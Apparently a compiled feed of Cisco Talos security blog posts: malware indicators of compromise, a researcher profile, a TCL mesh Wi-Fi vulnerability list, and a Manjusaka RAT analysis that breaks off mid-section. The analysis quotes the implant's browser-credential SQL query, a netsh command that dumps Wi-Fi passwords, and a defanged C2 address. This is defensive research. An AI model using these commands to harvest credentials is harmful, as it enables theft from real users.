10abdec91ee97c257bfe44b29232ea57a485d3d1cc72f8f706f3ed586910434b
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK


Win.Dropper.Kuluoz-9957187-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 15
<HKCU>\SOFTWARE\FVXBJPWU
Value Name: vcariano
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: llqjxikf
1
<HKCU>\SOFTWARE\PWWTTVLV
Value Name: twekalil
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: xxdfmerx
1
<HKCU>\SOFTWARE\EWMGTFIM
Value Name: anxufehi
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nqrwcsef
1
<HKCU>\SOFTWARE\WFPJGFQR
Value Name: vjiwxwuh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: wddfjook
1
<HKCU>\SOFTWARE\DRBVCKTP
Value Name: lpeeclca
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: igudfpld
1
<HKCU>\SOFTWARE\TBTCBEWS
Value Name: qbdbpkdf
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ddgljbjp
1
<HKCU>\SOFTWARE\ATTOEKEN
Value Name: euvumrrn
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: kxadigun
1
<HKCU>\SOFTWARE\NWOLGMSD
Value Name: okhudfoo
1
<HKCU>\SOFTWARE\SXPMECNO
Value Name: vbuvphur
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bshrfueu
1
<HKCU>\SOFTWARE\NAFNCVOV
Value Name: iatqgcgc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lnxhasuw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: oxviaxao
1
<HKCU>\SOFTWARE\BPLLBGMG
Value Name: aqonboar
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: iurwprlq
1
<HKCU>\SOFTWARE\BEOHVVNC
Value Name: mujhuapl
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: qsmriksl
1
Mutexes Occurrences
aaAdministrator 15
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
162[.]209[.]14[.]32 12
222[.]124[.]143[.]12 10
176[.]123[.]0[.]160 9
173[.]255[.]197[.]31 9
46[.]105[.]117[.]13 8
195[.]5[.]208[.]87 8
195[.]65[.]173[.]133 5
64[.]128[.]16[.]144 5
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 15

File Hashes

060286b4d0f8a14abe1ef08c1b3298eedd6ca8d7136514cbd28a64a80e4e5dd3 0dd7adbeab2b75d5d1e9d00ac3f59ac9e67dd4a7e2ac763e2de683d368b9f7ef 150f82c49d0a42de8a82632bb18077078076e9ba378291e5654e6cf0b14fb351 2c00d6f49dcc5bafbd868cf5c3894ddb21aa2216c54bfe148a7b861723c47a65 34f0305175ea18e197c488b450535c0cd8db1eccebdd6ecb2a2996fc813f14e7 4f4ccbcab032d9c6b8c97b452027d976b6dca4dd3c4237b8a3532f3d11bebd64 6ac1fa955677a1012e17bb3f35acf922f50d1f8810e94939ba2074756948aeae 81ce4d06b1af27b542e809e4e9f8e188782d4d14edf2a2dc94d9c857fe0c0560 8ef2563081b7dfd5e6c7c5d502b06e0d4c9fdf405b0fddbd60aff47a688e3a68 933f42380d718778039317a56fea346fbca1b07353edf46a97692ca4a6e20ba6 c9d671789d74e64450c9f33c2bb45a3337ce40ba06eb5632471fe624e2872616 cbf0ec5ad28bc4c6d44057398b3232fd519229ead06b88260b7b2d50bd5d95ac d178feddad4373a848f2fe9361b96ef7a907e1b1bd5127a5bb74926bb270d1a1 f22ba989587086403663558e7912a43b3a339f67ad42654b93c95e9120532de9 f3e21ed6c8cfc19a65076b58eddfe69683268b704649a47b513f5ef61368fe38

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK


Win.Dropper.DarkComet-9957280-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 10
Mutexes Occurrences
DC_MUTEX-F75JL20 10
Files and or directories created Occurrences
%TEMP%\Crypted.exe 12

File Hashes

0753d1475d7a3779684afe69f76ff81d7da01766fd34d85a23c1455008546108 0c7c5afce5165fd6be988f7aabe03abdbfdd8f0671dfe7f4b9fa73f243c9a9f1 238022cdf5b4fc75ecbb0db1654586b4686b43fcbabbcb17fec891879cdf3ba8 27bbe0f40ecf946a841f727101d707d57aadc31e4e5ca8699fe67aa61568c9b3 318eb4c14be4777bb921bbe44c1f7512d910c344fe4dbdfa373746cc7e767b1b 5631d5b53191510f47896a6fc0e9ba21e973cd35f25b21d26b984c1a46a7aca5 b45c2ab96c70d2beb2fda40032e1695324278c39918b0a8dfa3474a667c6312d b8adaf25ff8faa4c00b08993080daad260a6ba124199c020deabc8e38e636a3f c5469b740d9c2c7ffde2ea1e606fe044b87c4b21b4a502fdf63a7fd02aabc426 e36abaab1b6871ccb3ea2331168c7f04627f6861964b87b047241d79d56e664b e5daaf2b2c3c03711c622d482e0274ff1d4dbe3909969992864f2ea73c77ea8a ff107b513ffcf70490a9cef3e594bc15aba3c3f573e7b792d257f6e3188bf236

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK


Win.Trojan.Sality-9957294-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: AntiVirusOverride
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: AntiVirusDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: FirewallDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: FirewallOverride
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: UpdatesDisableNotify
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC
Value Name: UacDisableNotify
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\msiexec.exe
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\svchost.exe
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 23
<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007
Value Name: -757413758
21
<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007
Value Name: 1011363011
21
<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007
Value Name: -1514827516
21
<HKCU>\SOFTWARE\AASPPAPMMXKVS\-993627007
Value Name: 253949253
21
Mutexes Occurrences
uxJLpe1m 23
smss.exeM_204_ 15
<process name>.exeM_<pid>_ 3
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
20[.]72[.]235[.]82 14
23[.]207[.]52[.]109 13
23[.]207[.]56[.]109 10
20[.]109[.]209[.]108 9
20[.]103[.]85[.]33 9
20[.]81[.]111[.]85 8
20[.]84[.]181[.]62 5
20[.]53[.]203[.]50 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
support[.]microsoft[.]com 23
updatewindows[.]net 23
Files and or directories created Occurrences
\4091535952 23
%SystemRoot%\system.ini 19
%ProgramData%\dxwaolen.exe 1
%ProgramData%\dxfbqp.exe 1
%ProgramData%\dxpxcwowo.exe 1
%ProgramData%\dxdaph.exe 1
%ProgramData%\dxiybfjm.exe 1
%ProgramData%\dxuiyaear.exe 1
%ProgramData%\dxrflamrh.exe 1
%ProgramData%\dxiaolh.exe 1
%ProgramData%\dxczvbx.exe 1
%ProgramData%\dxezxtat.exe 1
%ProgramData%\dxayaahen.exe 1
%ProgramData%\dxvdovort.exe 1
%ProgramData%\dxupnglb.exe 1
%ProgramData%\dxzliuhie.exe 1
%ProgramData%\dxvros.exe 1
%ProgramData%\dxxakx.exe 1
%ProgramData%\dxueoa.exe 1
%ProgramData%\dxoupe.exe 1
%ProgramData%\dxhbtsa.exe 1
%ProgramData%\dxquorfdh.exe 1
%ProgramData%\dxyjlzmr.exe 1
%ProgramData%\dxwetlif.exe 1
%ProgramData%\dxcmiazi.exe 1

File Hashes

155b235838bb38a009d3959a22afeefe29990bf08b886d450d5523a1e8ef52e9 1ab9fcb9422511f11ce386dd89602256b4423cc13df20d8cae15cf74ac96899c 1ebee245aa20139a5c0d78869e42cb7700b2c746fe554000dc24fd6d79b2dc7a 37ef12da9294aa84a551a49705c9aaeffa3e440ac9183e670aaae18de6f0cee9 38690107fc5ab4fc661469ab6d179f6a8f98ffc6abeeae8e8fb879fa24c92818 3c73ee4a0a2a9d2f78dd95d11df24a3d27c3a14ff2e6f56e014f10d0832bb869 4888ce37000aa2d5029dcdf080efb7ccf3b4ba347ee24103df15a3cb9be4dc5b 4d9868767a8260a2c0f663eb424f491de8cc1706ade137c59ce84c9da5e15e50 541a54f29dbcd3412f244a16098acf87f466699a5832270e4d7d642b067c32a1 56ecf33836287e107f9bda8a3522fddf9cc699f6e291990ab66753d692ac92b2 605c9f1b05b0b47ed4e99a34a526adfed8eb56ce724815fd207708c94313883e 6e99fec151c58577d9360fd6f846a0e436907258ad24b0117be07ab438b89abb 79e56d2705ee36750de0b2b521777d73ea3fec9faca7ca78a39c06ac5e689b0a 7bd446737e62430c0ed764392c1573c8b3b81ac3c969a473a7cab9849302eff4 83f4e46b5dd1811bd62b184710cb206ab7ac5ae0a52a797745fe400cde4ed2f4 8a99d2f8e63dc8bdfe9c10be15e65a881e473afa45dc349ad8a9bf387cb90e91 8f618126cfbdd291e149f978420a885cbc31876de6771c78a32b60edf47225a6 9c447450d5f5767d268341ebd7fdf3e50b302bae87d7ea1ca7ffc45d81b271ac aca2c69def78f145126fd8f2a9e88326ee74c80e59b704dd5a48a3de91effe94 c9216a18da434cd1d24b0e57e2f1236d3ebcd9d38d4b772153db4bb60a661b54 da3ee20e162f6ee44397e737ca1f7c3d371f41075414c959ddbdbb4d06dfbd94 e15c93bf9e1f8ad217103c0d9156cabc5a923ba3bf177b7cde178854a1efb243 f254301a5209750c391375336d9b93e19b45e557e0cd97a504df6b22d52facce

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK

Researcher Spotlight: You should have been listening to Lurene Grenier years ago

1 August 2022 at 12:00

The exploit researcher recently rejoined Talos after starting her career with the company’s predecessor 

By Jonathan Munshaw. 

Lurene Grenier says state-sponsored threat actors keep her up at night, even after years of studying and following them.  

She’s spent her security career warning people why this was going to be a problem. 

Today if someone is compromised by a well-funded, state-sponsored actor, she is concerned but doesn’t necessarily feel sorry. After all, she’s been warning the security community about this for years. 

“You think about the phrase ‘fool me once, shame on you...’ Five years ago if we had this discussion and you were hit with an attack, you’d think ‘shame on China,’” she said. “Today, if we have that discussion about why you were hit, it’s shame on us.” 

Grenier has spent her career looking at state-sponsored actor trends and writing detection content to block those actors.

She was one of the first of the smaller research staff at the Sourcefire Vulnerability Research Team, which eventually merged with a few other teams to form Talos. Matt Watchinski, who is now the vice president of Talos, initially hired Grenier as a vulnerability exploit researcher, doing the job of what more than a dozen people do today for Talos. 

Grenier looked at vulnerability details for regular patch cycles like Microsoft Patch Tuesday and write her own exploit code for the vulnerabilities, which eventually fed into detection content that would block attackers’ attempts to target these issues in the wild. She grew with VRT, eventually overseeing the Analyst Team, which today is the main producer of detection content for Cisco Secure products and Snort.  

She eventually took a few other paths on her security journey outside of Cisco and Talos, but recently rejoined Talos as a special advisor to Watchinski, studying state-sponsored actors and major attacker trends using Talos’ data and telemetry.  

“My main directive is to come up with plans for this mountain of data that we have,” Grenier said. “I look at the data that we do have and see what outcomes for customers we can achieve with it. Can we create something like a semi-autonomous mediation plan when there is a breach? Can we track actors in a more granular manner so we can match them with what we’ve seen in the past?” 

Even during her time away from Talos, Grenier never lost connection, speaking at two Talos Threat Research Summits that were a part of Cisco Live. In 2018, she even gave a presentation on how organizations were not taking threats from state-sponsored actors seriously enough and warned about the theft of intellectual property. Some of the same techniques and actors she warned about in that talk resurfaced earlier this year in a warning from federal agencies in the U.S. and the U.K., stating that Chinese state-sponsored actors were stealing important IP and creating fraudulent “tech transfer” agreements. 

While Grenier still tracks these same actors daily, she views their activity as more of an inevitability that's going to produce the worst-case scenario rather than anything that can be avoided at this point. 

“It’s like earthquakes or famine, it’s really just horrible,” she said. 

At this point, Grenier is focusing her work on how to make attacks as costly as possible for the adversary, rather than trying to avoid them altogether. If her research can help even slow down an actor for a bit or cost them more resources when they go to attack again, that’s a small victory to build off. 

“People have to see the cost of these breaches,” she said. “And they’re not going to see the inflection point for a while now, but it will eventually become very obvious.” 

Although she spent several years away from Talos, coming back to the organization (a few hundred more researchers later) was easy for Grenier because the company culture fostered at Sourcefire carries over today with leadership. Grenier said she most enjoys the “work smart, play hard” attitude, where she recognizes there will be some late nights and long days, but it will never be wasteful work. She also enjoys the work-life balance that her current remote role offers her and the flexibility to try new things and explore new research avenues.  

A lot of the security community, she said, is focused on selling solutions that are “plug and play” for the end user. But the difference with Talos is that our research informs users and administrators deploying Cisco Secure solutions so they understand the broader context of what our intelligence means. 

“We’re not just selling it to people who don’t understand what they’re doing in the first place,” she said. “The focus here is on doing real, impactful work, and not just thinking ‘Oh what can we do for this threat?’ At Talos, you’ll also be asked to engage your brain to do the useful thing, the thing that ought to happen.” 

Grenier tries to engage her brain in all sorts of ways even when she’s not at her desk. She enjoys playing music in her free time, specifically jazz-influenced blues music. The fast-paced, free-formed genre ties into the learning and reaction she must do in the moment as new state-sponsored actors develop new tactics and techniques. Just don’t expect her to be sharing any of these insights on Twitter any time soon. 

“Social media is the biggest mistake we have ever made,” she said.  

Fans will just have to look for Lurene at the next Talos Threat Research Summit for her next five-year prognostication, then.  

Vulnerability Spotlight: How misusing properly serialized data opened TCL LinkHub Mesh Wi-Fi system to 17 vulnerabilities

1 August 2022 at 16:18



By Carl Hurd. 

The TCL LinkHub Mesh Wi-Fi system is a multi-device Wi-Fi system that allows users to expand access to their network over a large physical area. What makes the LInkHub system unique is the lack of a network interface to manage the devices individually or in the mesh. Instead, a phone application is the only method to interact with these devices. This is noteworthy because, in theory, it significantly reduces the common attack surface on most small office/home office (SOHO) routers, as it moves the entire HTTP/S code base from the product. This means, in theory, fewer issues with integration or hacked-together scripts to trigger various functions within the device. One of the issues with this approach though is that its functionality still needs to reside somewhere for the user to manage the device. 

However, this setup leaves the LinkHub Mesh Wi-Fi system open to several vulnerabilities, which we are disclosing today. An attacker could exploit these vulnerabilities to carry out a variety of malicious actions, including injecting code at the operating system level, stealing credentials and causing a denial of service of the entire network. Cisco Talos is disclosing these vulnerabilities despite no official fix from TCL, all in adherence to Cisco’s vulnerability disclosure policy
Moving all the management functionality to the phone application makes it the most interesting path to research for this device. The first step is to understand the protocol used for communication. There are a few easy choices, TCL could have decided to use HTTP with hidden endpoints, or some hand-rolled protocol for communication, to make capturing and identifying the traffic the priority. Looking at the capture right away, it’s not HTTP or another text-based protocol, so the next step is determining if this is a custom protocol or something more widely used. 
Network traffic capture of Android application communication. 



While investigating various binaries on the device and the Android application, it became clear that the method for serializing data is the widely used Proto Buffers library. Proto Buffers serializes data using a platform-agnostic definition file. Once the definition file has been created, the protoc compiler can create the boilerplate code needed for various programming languages to communicate using the defined serialization. An interesting side effect of utilizing Proto Buffers is that the definition code needs to be embedded in the boilerplate code for each side to be able to deserialize data into a usable format for each language supported by the compiler. By determining how this data is included in the deserializing code, one can recover an almost perfect representation of the definition file from compiled binaries. 

Proto Buffer structure recovered from binary. 
Proto file recovered from the binary. 

Once the proto files have been recovered, the file can be compiled to any supported language. This makes interacting with the service incredibly simple once the proto file has been extracted. The usage of Proto Buffers has another advantage for vulnerability research: The Proto Buffer serialization and deserialization are very well tested. That is not to say that it is perfect and bug-free, but for the purposes of this research, it made sense to ignore any code generated from protoc. This research was completely focused on the business logic and handling of data once it had been deserialized, all code which TCL is responsible for. 

The next roadblock for general security research to begin was authentication. The user does not need to provide a password in the TCL app to authenticate the device, so it was either pre-negotiated upon pairing or some other information is used. After reviewing some network captures with recovered protocol information, it was clear that these devices use the serial number as the password for authentication, what is worse is that a serial number can be requested (and is requested in normal authentication flow) without any permissions and as such, this is not an authentication method at all. After recreating this pseudo-login method, the research could proceed to look for vulnerabilities. 

During this research, 17 different vulnerability reports were generated. These reports group together similar CVEs into reports that are sent to vendors, and in this case are a grouping of 41 unique CVEs. Many of the discovered vulnerabilities are related to the Proto Buffer management protocol, as well as the general usage of recovering configurations from memory For more information on each of these vulnerabilities, check out their full reports, linked below. 

The following Snort rules will detect exploitation attempts against this vulnerability: 59013, 59020, 59026 – 59029, 59058, 59059, 59061, 59289 – 59291 and 59406 - 59411. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. 

Buffer overflow vulnerabilities 

  • Talos-2022-1454: TCL LinkHub Mesh Wifi confsrv set_port_fwd_rule stack-based buffer overflow vulnerability 
  • Talos-2022-1455: TCL LinkHub Mesh Wifi confsrv set_mf_rule stack-based buffer overflow vulnerability 
  • Talos-2022-1456: TCL LinkHub Mesh Wifi confers ucloud_add_node_new stack-based buffer overflow vulnerability 
  • Talos-2022-1462: TCL LinkHub Mesh Wi-Fi confsrv confctl_set_app_language stack-based buffer overflow vulnerability 
  • Talos-2022-1463: TCL LinkHub Mesh Wifi GetValue buffer overflow vulnerability 
  • Talos-2022-1482: TCL LinkHub Mesh Wi-Fi confsrv addTimeGroup stack-based buffer overflow vulnerability 
  • Talos-2022-1483: TCL LinkHub Mesh Wi-Fi confsrv ucloud_set_node_location stack-based buffer overflow vulnerability 
  • Talos-2022-1484: TCL LinkHub Mesh Wi-Fi confsrv ucloud_set_node_location buffer overflow vulnerability 

Command injection vulnerabilities 

  • Talos-2022-1457: TCL LinkHub Mesh Wifi confsrv ucloud_add_node_new OS command injection vulnerability  
  • Talos-2022-1458: TCL LinkHub Mesh Wifi confsrv ucloud_add_node OS command injection vulnerability 

Information disclosure vulnerabilities 

  • Talos-2022-1503: TCL LinkHub Mesh Wifi confctl_get_guest_wlan information disclosure vulnerability 
  • Talos-2022-1504: TCL LinkHub Mesh Wifi confctl_get_master_wlan information disclosure vulnerability 

Denial-of-service vulnerabilities 

  • Talos-2022-1502: TCL LinkHub Mesh Wifi confctl_set_guest_wlan denial of service vulnerability 
  • Talos-2022-1505: TCL LinkHub Mesh Wifi confctl_set_master_wlan denial of service vulnerability 
  • Talos-2022-1506: TCL LinkHub Mesh Wi-Fi confctl_set_wan_cfg denial of service vulnerability 
  • Talos-2022-1507: TCL LinkHub Mesh Wifi ucloud_del_node denial of service vulnerability 

Hard-coded credential vulnerability 

  • Talos-2022-1459: TCL LinkHub Mesh Wifi libcommonprod.so prod_change_root_passwd hard-coded password vulnerability 

Manjusaka: A Chinese sibling of Sliver and Cobalt Strike

2 August 2022 at 12:00


By Asheer Malhotra and Vitor Ventura.

  • Cisco Talos recently discovered a new attack framework called "Manjusaka" being used in the wild that has the potential to become prevalent across the threat landscape. This framework is advertised as an imitation of the Cobalt Strike framework.
  • The implants for the new malware family are written in the Rust language for Windows and Linux.
  • A fully functional version of the command and control (C2), written in GoLang with a User Interface in Simplified Chinese, is freely available and can generate new implants with custom configurations with ease, increasing the likelihood of wider adoption of this framework by malicious actors.
  • We recently discovered a campaign in the wild using lure documents themed around COVID-19 and the Haixi Mongol and Tibetan Autonomous Prefecture, Qinghai Province. These maldocs ultimately led to the delivery of Cobalt Strike beacons on infected endpoints.
  • We have observed the same threat actor using the Cobalt Strike beacon and implants from the Manjusaka framework.


Introduction


Cisco Talos has discovered a relatively new attack framework called "Manjusaka" (which can be translated to "cow flower" from the Simplified Chinese writing) by their authors, being used in the wild.

As defenders, it is important to keep track of offensive frameworks such as Cobalt Strike and Sliver so that enterprises can effectively defend against attacks employing these tools. Although we haven't observed widespread usage of this framework in the wild, it has the potential to be adopted by threat actors all over the world. This disclosure from Talos intends to provide early notification of the usage of Manjusaka. We also detail the framework's capabilities and the campaign that led to the discovery of this attack framework in the wild.

The research started with a malicious Microsoft Word document (maldoc) that contained a Cobalt Strike (CS) beacon. The lure on this document mentioned a COVID-19 outbreak in Golmud City, one of the largest cities in the Haixi Mongol and Tibetan Autonomous Prefecture, Qinghai Province. During the investigation, Cisco Talos found no direct link between the campaign and the framework developers, aside from the usage of the framework (which is freely available on GitHub). However, we could not find any data that could support victimology definition. This is justifiable considering there's a low number of victims, indicating the early stages of the campaign, further supported by the maldoc metadata that indicates it was created in the second half of June 2022.

While investigating the maldoc infection chain, we found an implant used to instrument Manjusaka infections, contacting the same IP address as the CS beacon. This implant is written in the Rust programming language and we found samples for Windows and Linux operating systems. The Windows implant included test samples, which had non-internet-routable IP addresses as command and control (C2). Talos also discovered the Manjusaka C2 executable — a fully functional C2 ELF binary written in GoLang with a User Interface in Simplified Chinese — on GitHub. While analyzing the C2, we generated implants by specifying our configurations. The developer advertises it has an adversary implant framework similar to Cobalt Strike or Sliver.

The developers have provided a design diagram of the Manjusaka framework illustrating the communications between the various components. A lot of these components haven't been implemented in the C2 binary available for free. Therefore, it is likely that either:

  • The framework is actively under development with these capabilities coming soon OR
  • The developer intends to or is already providing these capabilities via a service/tool to purchase - and the C2 available for free is just a demo copy for evaluation.



Manjusaka design diagram.




Manjusaka attack framework


The malware implant is a RAT family called "Manjusaka." The C2 is an ELF binary written in GoLang, while the implants are written in the Rust programming language, consisting of a variety of capabilities that can be used to control the infected endpoint, including executing arbitrary commands. We discovered EXE and ELF versions of the implant. Both sets of samples catering to these platforms consist of almost the same set of RAT functionalities and communication mechanisms.


Communications

The sample makes HTTP requests to a fixed address http[:]//39[.]104[.]90[.]45/global/favicon.png that contains a fixed session cookie defined by the sample rather than by the server. The session cookie in the HTTP requests is base64 encoded and contains a compressed copy of binary data representing a combination of random bytes and system preliminary information used to fingerprint and register the infected endpoint with the C2. The image below shows the information used to generate such a session cookie.



The information on the cookie is arranged as described in the table below before it is compressed and encoded into base64.




The communication follows a regular pattern of communication, the implant will make a request to an URL which in this case is '/global/favicon.png', as seen in the image below.




Even though the request is an HTTP GET, it sends two bytes that are 0x191a as data. The reply is always the same, consisting of five bytes 0x1a1a6e0429. This is the C2 standard reply, which does not correspond to any kind of action on the implant.

If the session cookie is not provided, the server will reply with a 302 code redirecting to http[:]//micsoft[.]com which is also redirected, this time with a 301, to http[:]//wwwmicsoft[.]com. At the time of publishing, the redirection seems like a trick to distract researchers. Talos could not find any direct correlation between the domains and the authors and/or operators of this C2.


Implant capabilities


The implant consists of a multitude of remote access trojan (RAT) capabilities that include some standard functionality and a dedicated file management module.




Switch cases for handling various requests received by the C2.


Commands serviced by the RAT


The implant can perform the following functions on the infected endpoint based on the request and accompanying data received from the C2 server:

  • Execute arbitrary commands: The implant can run arbitrary commands on the system using "cmd.exe /c".



  • Get file information for a specified file: Creation and last write times, size, volume serial number and file index.
  • Get information about the current network connections (TCP and UDP) established on the system, including Local network addresses, remote addresses and owning Process IDs (PIDs).
  • Collect browser credentials: Specifically for Chromium-based browsers using the query: SELECT signon_realm, username_value, password_value FROM logins ; Browsers targeted: Google Chrome, Chrome Beta, Microsoft Edge, 360 (Qihoo), QQ Browser (Tencent), Opera, Brave and Vivaldi.
  • Collect Wi-Fi SSID information, including passwords using the command: netsh wlan show profile <WIFI_NAME> key=clear


  • Obtain Premiumsoft Navicat credentials: Navicat is a graphical database management utility that can connect to a variety of DB types such as MySQL, Mongo, Oracle, SQLite, PostgreSQL, etc. The implant enumerates through the installed software's registry keys for each configured DB server and obtains the values representing the Port, UserName, Password (Pwd).


  • Take screenshots of the current desktop.
  • Obtain comprehensive system information from the endpoint, including:
    • System memory global information.
    • Processor power information.
    • Current and critical temperature readings from WMI using "SELECT * FROM MSAcpi_ThermalZoneTemperature"
    • Information on the network interfaces connected to the system: Names
    • Process and System times: User time, exit time, creation time, kernel time.
    • Process module names.
    • Disk and drive information: Volume serial number, name, root path name and disk free space.
    • Network account names, local groups.
    • Windows build and major version numbers.
  • Activate the file management module to carry out file-related activities.


File Management Capabilities


The file management capabilities of the implant include:

  • File enumeration: List files in a specified location on disk. This is essentially the "ls" command.
  • Create directories on the file system.
  • Get and set the current working directory.
  • Obtain the full path of a file.
  • Delete files and remove directories on disk.
  • Move files between two locations. Copy the file to a new location and delete the old copy.



Copy file operation done and part of the move.

  • Read and write data to and from the file.


ELF variant


The ELF variant consists of pretty much the same set of functionalities as its Windows counterpart. However, two key functionalities missing in the ELF variant are the ability to collect credentials from Chromium-based browsers and harvest Wi-Fi login credentials.

Just like the Windows version, the ELF variant also collects a variety of system-specific information from the endpoint:

  • Global system information such as page size, clock tick count, current time, hostname, version, release, machine ID, etc.
  • System memory information from /proc/meminfo including cached memory size, free and total memory, swap memory sizes and Slab memory sizes.
  • System uptime from /proc/uptime: System uptime and idle time of cores.
  • OS identification information from /proc/os-release and lsb-release.
  • Kernel activity information from /proc/stat.
  • CPU information from /proc/cpuinfo and /sys/devices/system/cpu/cpu*/cpufreq/scaling_max_freq
  • Temperature information from /sys/class/hwmon and /sys/class/thermal/thermal_zone*/temp
  • Network interfaces information and statistics from /sys/class/net.
  • Device mount and file system information. SCSI device information.
  • Account information from /etc/passwd and group lists of users.


Both versions contain functionally equivalent file management modules that are used exclusively for managing files and directories on the infected system.



EXE vs ELF versions of the implant containing functionally equivalent file management modules.


Command and control server


During the course of our investigation, we discovered a copy of the C2 server binary for Manjusaka hosted on GitHub at hxxps://github[.]com/YDHCUI/manjusaka.

It can monitor and administer an infected endpoint and can generate corresponding payloads for Windows and Linux. The payloads generated are the Rust implants described earlier.

The C2 server and admin panel are primarily built on the Gin Web Framework which is used to administer and issue commands to the Rust-based implants/stagers.



C2 server implant generation prompt.

After filling in the several options, the operator presses the "generate" button. This fires a GET request to the C2 following the format below.

